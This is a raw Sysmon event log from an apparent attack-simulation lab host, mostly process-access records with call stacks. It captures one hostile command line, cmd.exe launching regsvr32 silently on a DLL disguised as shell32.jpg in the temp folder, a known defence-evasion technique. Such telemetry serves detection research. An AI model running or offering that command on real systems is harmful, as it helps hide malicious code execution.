10341000x8000000000000000360823Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360822Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360821Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360820Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360819Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360818Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360817Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360816Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360815Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360814Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.124{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360813Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.109{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360812Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.109{8e433fbf-2a44-6013-1100-000000001100}11165612C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360811Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.109{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360810Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360809Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360808Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360807Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360806Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360805Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.062{8e433fbf-36e1-6013-a503-000000001100}50886836C:\Windows\system32\cmd.exe{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360804Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.067{8e433fbf-36e1-6013-a603-000000001100}6696C:\Windows\System32\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s C:\Users\ADMINI~1\AppData\Local\Temp\shell32.jpg C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s %temp%\shell32.jpg" 13241300x8000000000000000360803Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:49.062{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360802Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360801Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36e1-6013-a503-000000001100}5088C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000360800Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360799Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.046{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360798Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 